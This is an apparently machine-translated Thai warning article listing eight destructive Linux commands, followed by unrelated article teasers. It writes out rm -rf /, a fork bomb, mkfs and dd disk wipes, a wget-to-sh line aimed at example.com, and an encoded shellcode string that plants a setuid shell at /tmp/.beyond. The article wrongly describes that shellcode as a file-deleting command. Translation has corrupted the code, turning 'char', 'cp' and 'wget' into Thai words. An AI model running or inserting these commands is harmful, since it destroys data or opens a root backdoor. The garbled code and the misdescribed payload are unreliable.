8 คำสั่งอันตรายที่ไม่ควรรันบน Linux

8 คำสั่งอันตรายที่ไม่ควรรันบน Linux

คำสั่งเทอร์มินัลบน Linux ค่อนข้างทำลายล้าง หากคุณรันคำสั่ง มันจะทำลายระบบของคุณ Linux ไม่ต้องการให้คุณยืนยันเมื่อรันคำสั่งใดๆ

การเรียนรู้ว่าคำสั่งใดไม่ควรรันบน Linux จะช่วยปกป้องระบบของคุณเมื่อทำงานบน Linux ด้านล่างนี้คือ 8 คำสั่งอันตรายที่คุณไม่ควรรันบน Linux

8 คำสั่งอันตรายที่ไม่ควรรันบน Linux

1. rm -rf / - ลบทุกอย่าง

คำสั่ง rm -rf / จะลบทุกอย่าง รวมถึงไฟล์ในฮาร์ดไดรฟ์และไฟล์ในอุปกรณ์สื่อที่เชื่อมต่อกับคอมพิวเตอร์ของคุณ

เพื่อให้เข้าใจคำสั่งนี้ได้ดีขึ้น ให้วิเคราะห์ดังนี้:

  • rm - ลบไฟล์ต่อไปนี้
  • -rf - รัน rm (ลบไฟล์และโฟลเดอร์ทั้งหมดภายในโฟลเดอร์ที่ระบุ) และบังคับให้ลบไฟล์ทั้งหมดโดยไม่ถามคุณก่อน
  • / – บอก rm (พูด rm) เริ่มต้นในไดเร็กทอรีราก รวมถึงไฟล์ทั้งหมดบนคอมพิวเตอร์ของคุณ

Linux จะปฏิบัติตามคำสั่งนี้อย่างมีความสุขและลบทุกอย่างโดยไม่แจ้งเตือนคุณ ดังนั้นควรระมัดระวังเมื่อใช้คำสั่งนี้

นอกจากนี้ คำสั่ง rm ยังถูกใช้ในลักษณะที่อันตรายมากอีกด้วย ตัวอย่างเช่น rm –rf ~ จะลบไฟล์ทั้งหมดใน Home Folder ของคุณ และ rm -rf .* จะลบไฟล์การกำหนดค่าทั้งหมดของคุณ

2. คำสั่งปลอมตัว rm –rf /

นี่เป็นตัวอย่างโค้ดทั่วทั้งเว็บ:

ถ่าน esp[] __attribute__ ((ส่วน (".text"))) /* esp release */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" " \xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7 " "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80 \x31" "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x2d\x63\x00" "ซีพี - p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

นี่เป็นอีกเวอร์ชันหนึ่งของ rm –rf / – การดำเนินการคำสั่งนี้จะลบไฟล์ทั้งหมดของคุณด้วย เช่นเดียวกับการรัน rm –rf /

3. :(){ :|: & };: – หนังดังประเภทหนึ่ง

8 คำสั่งอันตรายที่ไม่ควรรันบน Linux

บรรทัดคำสั่งด้านล่างดูเรียบง่าย แต่จริงๆ แล้วฟังก์ชันของมันอันตรายมาก:

:(){ :|: & };:

คำสั่งสั้น ๆ นี้จะสร้างสำเนาใหม่ของตัวเอง นั่นคือกระบวนการสำรองข้อมูลจะต่อเนื่องและรวดเร็วทำให้ CPU และหน่วยความจำของคุณเต็ม

นอกจากนี้ยังอาจทำให้คอมพิวเตอร์ของคุณค้างได้ โดยพื้นฐานแล้วมันเป็นการโจมตีแบบปฏิเสธการให้บริการ (DoS)

4. mkfs.ext4 /dev/sda1 – รูปแบบฮาร์ดไดรฟ์

คำสั่ง mkfs.ext4 /dev/sda1 ค่อนข้างเข้าใจง่าย:

  • mkfs.ext4 - สร้างระบบไฟล์ ext4 บนอุปกรณ์ต่อไปนี้
  • /dev/sda1 - ระบุพาร์ติชันแรกบนฮาร์ดไดรฟ์ตัวแรก ซึ่งอาจเป็นฮาร์ดไดรฟ์ที่ใช้งานอยู่

การรวมคำสั่งทั้งสองนี้เข้าด้วยกันจะเทียบเท่ากับการฟอร์แมตไดรฟ์ C: บน Windows โดยลบไฟล์ทั้งหมดในพาร์ติชันแรกของคุณและแทนที่ด้วยระบบไฟล์ใหม่

คำสั่งนี้สามารถปรากฏในรูปแบบต่างๆ มากมาย เช่น - mkfs.ext3 /dev/sdb2 จะฟอร์แมตพาร์ติชันที่สองบนฮาร์ดไดรฟ์ตัวที่สองของคุณด้วยระบบไฟล์ ext3

5. command > /dev/sda - เขียนลงฮาร์ดไดรว์โดยตรง

8 คำสั่งอันตรายที่ไม่ควรรันบน Linux

บรรทัดคำสั่ง > /dev/sda - รันคำสั่งและส่งออกผลลัพธ์ของคำสั่งนั้นโดยตรงไปยังฮาร์ดไดรฟ์ตัวแรกของคุณ เขียนข้อมูลโดยตรงไปยังฮาร์ดไดรฟ์ และทำลายระบบไฟล์ของคุณ

  • command – รันคำสั่ง (สามารถเป็นคำสั่งใดก็ได้)
  • > – ส่งเอาต์พุตคำสั่งไปยังตำแหน่งต่อไปนี้
  • /dev/sda – เขียนเอาต์พุตคำสั่งโดยตรงไปยังอุปกรณ์ฮาร์ดไดรฟ์

6. dd if=/dev/random of=/dev/sda – เขียนข้อมูลไร้สาระลงในฮาร์ดไดรฟ์

บรรทัด dd if=/dev/random of=/dev/sda จะลบข้อมูลในฮาร์ดไดรฟ์ตัวใดตัวหนึ่งของคุณ

  • dd - คือการคัดลอกระดับต่ำจากที่หนึ่งไปอีกที่หนึ่ง
  • if=/dev/random – ใช้ /dev/random เป็นอินพุต – คุณอาจเห็นที่อยู่เช่น /dev/zero
  • of=/dev/sda – ส่งออกไปยังฮาร์ดไดรฟ์ตัวแรก โดยแทนที่ระบบไฟล์ด้วยข้อมูลสุ่มแบบสุ่ม

7. mv ~ /dev/null – ย้ายโฮมไดเร็กทอรีของคุณไปที่หลุมดำ

/dev/null - การย้ายบางสิ่งไปที่ /dev/null ก็เหมือนกับการทำลายมัน คิดว่า /dev/null เป็นหลุมดำ mv ~ /dev/null จะส่งไฟล์ส่วนตัวทั้งหมดของคุณไปยังหลุมดำ

  • mv – ย้ายไฟล์หรือโฟลเดอร์ต่อไปนี้ไปยังตำแหน่งอื่น
  • ~ – โฮมโฟลเดอร์ทั้งหมดของคุณ
  • /dev/null – ย้ายโฮมโฟลเดอร์ของคุณไปที่ /dev/null มันจะทำลายไฟล์ทั้งหมดของคุณและลบสำเนาต้นฉบับ

8. รับ http://example.com/something -O – | sh – โหลดและรันสคริปต์

คำสั่งดังกล่าวจะดาวน์โหลดสคริปต์จากเว็บและส่งสคริปต์ไปที่ sh ซึ่งจะดำเนินการเนื้อหาของสคริปต์ สิ่งนี้อาจเป็นอันตรายได้หากคุณไม่แน่ใจว่าสคริปต์คืออะไร หรือคุณไม่มีแหล่งสคริปต์ที่เชื่อถือได้ อย่าเรียกใช้สคริปต์ที่ไม่น่าเชื่อถือ

wget – ดาวน์โหลดไฟล์

http://example.com/something – ดาวน์โหลดไฟล์จากตำแหน่งนี้

| – ไพพ์ (ส่ง) เอาต์พุตของคำสั่ง wget (ไฟล์เวอร์ชันที่ดาวน์โหลด) ไปยังคำสั่งอื่นโดยตรง

sh - ส่งไฟล์ไปที่คำสั่ง sh

อ้างถึงบทความเพิ่มเติมด้านล่าง:

ขอให้สนุก!


คำแนะนำจาก AZ เกี่ยวกับวิธีติดตั้ง Windows 10 บิวด์ 14393.222

คำแนะนำจาก AZ เกี่ยวกับวิธีติดตั้ง Windows 10 บิวด์ 14393.222

ล่าสุด Microsoft เปิดตัวการอัปเดตสะสมล่าสุดสำหรับผู้ใช้พีซี Windows 10 ที่เรียกว่า Build 14393.222 การอัปเดตนี้เผยแพร่สำหรับ Windows 10 โดยส่วนใหญ่จะแก้ไขจุดบกพร่องตามคำติชมของผู้ใช้ และปรับปรุงประสบการณ์ด้านประสิทธิภาพของระบบปฏิบัติการ

ปกป้องเครือข่ายคอมพิวเตอร์ของคุณด้วยโฮสต์ Bastion ในเวลาเพียง 3 ขั้นตอน

ปกป้องเครือข่ายคอมพิวเตอร์ของคุณด้วยโฮสต์ Bastion ในเวลาเพียง 3 ขั้นตอน

คุณมีคอมพิวเตอร์บนเครือข่ายท้องถิ่นที่ต้องการการเข้าถึงจากภายนอกหรือไม่? การใช้โฮสต์ป้อมปราการเป็นผู้ดูแลเครือข่ายของคุณอาจเป็นทางออกที่ดี

วิธีสร้างคีย์ Windows หากไม่มีแป้นพิมพ์ของคุณ

วิธีสร้างคีย์ Windows หากไม่มีแป้นพิมพ์ของคุณ

หากคุณต้องการใช้แป้นพิมพ์คลาสสิกรุ่นเก่า เช่น IBM Model M ที่ไม่มีคีย์ Windows มาให้ มีวิธีง่ายๆ ในการเพิ่มคีย์เพิ่มเติมโดยการยืมคีย์ที่คุณไม่ได้ใช้บ่อย

3 วิธีในการล้างบันทึกเหตุการณ์ทั้งหมดใน Windows 10 อย่างรวดเร็ว

3 วิธีในการล้างบันทึกเหตุการณ์ทั้งหมดใน Windows 10 อย่างรวดเร็ว

บางครั้งคุณอาจต้องลบบันทึกเหตุการณ์เก่าทั้งหมดพร้อมกัน ในคู่มือนี้ Quantrimang.com จะแสดง 3 วิธีในการลบบันทึกเหตุการณ์ทั้งหมดใน Windows 10 Event Viewer อย่างรวดเร็ว

วิธี IP ปลอมช่วยให้คุณเข้าถึงโดยไม่ระบุชื่อ

วิธี IP ปลอมช่วยให้คุณเข้าถึงโดยไม่ระบุชื่อ

ในบทความก่อนหน้านี้หลายบทความ เราได้กล่าวไว้ว่าการไม่เปิดเผยตัวตนทางออนไลน์เป็นสิ่งสำคัญอย่างยิ่ง ข้อมูลส่วนตัวรั่วไหลทุกปี ทำให้การรักษาความปลอดภัยออนไลน์มีความจำเป็นมากขึ้น นั่นคือเหตุผลที่เราควรใช้ที่อยู่ IP เสมือน ด้านล่างนี้เราจะเรียนรู้เกี่ยวกับวิธีการสร้าง IP ปลอม!

วิธีสร้างโหมดพื้นหลังโปร่งใสบน Windows 10

วิธีสร้างโหมดพื้นหลังโปร่งใสบน Windows 10

WindowTop เป็นเครื่องมือที่มีความสามารถในการหรี่หน้าต่างแอปพลิเคชันและโปรแกรมทั้งหมดที่ทำงานบนคอมพิวเตอร์ Windows 10 หรือคุณสามารถใช้อินเทอร์เฟซพื้นหลังสีเข้มบน windows ได้

วิธีปิดแถบภาษาบนทาสก์บาร์ของ Windows 8

วิธีปิดแถบภาษาบนทาสก์บาร์ของ Windows 8

แถบภาษาบน Windows 8 เป็นแถบเครื่องมือภาษาขนาดเล็กที่ออกแบบมาเพื่อแสดงบนหน้าจอเดสก์ท็อปโดยอัตโนมัติ อย่างไรก็ตาม หลายๆ คนต้องการซ่อนแถบภาษานี้บนทาสก์บาร์

วิธีการตั้งค่า WEP, WPA, WPA2 สำหรับเราเตอร์ Linksys

วิธีการตั้งค่า WEP, WPA, WPA2 สำหรับเราเตอร์ Linksys

การเชื่อมต่อไร้สายถือเป็นสิ่งจำเป็นในปัจจุบัน และด้วยเหตุนี้ การรักษาความปลอดภัยแบบไร้สายจึงถือเป็นสิ่งสำคัญในการรับรองความปลอดภัยในเครือข่ายภายในของคุณ

เคล็ดลับในการปรับความเร็วการเชื่อมต่ออินเทอร์เน็ตจาก Linksys ให้เหมาะสม

เคล็ดลับในการปรับความเร็วการเชื่อมต่ออินเทอร์เน็ตจาก Linksys ให้เหมาะสม

การเพิ่มความเร็วอินเทอร์เน็ตให้สูงสุดถือเป็นสิ่งสำคัญในการเพิ่มประสิทธิภาพการเชื่อมต่อเครือข่ายของคุณ คุณสามารถมีความบันเทิงและประสบการณ์การทำงานที่ดีที่สุดโดยใช้คอมพิวเตอร์ ทีวีที่เชื่อมต่ออินเทอร์เน็ต เครื่องเล่นเกม ฯลฯ

เคล็ดลับในการแสดงการแจ้งเตือนบนหน้าจอเข้าสู่ระบบ Windows 10

เคล็ดลับในการแสดงการแจ้งเตือนบนหน้าจอเข้าสู่ระบบ Windows 10

หากคุณกำลังแชร์คอมพิวเตอร์กับเพื่อนหรือสมาชิกในครอบครัว หรือจัดการคอมพิวเตอร์หลายเครื่องโดยเฉพาะ คุณอาจเผชิญกับสถานการณ์ที่ไม่พึงประสงค์ซึ่งคุณต้องการเตือนพวกเขาด้วยบันทึกย่อก่อนที่พวกเขาจะเข้าสู่ระบบคอมพิวเตอร์ต่อไป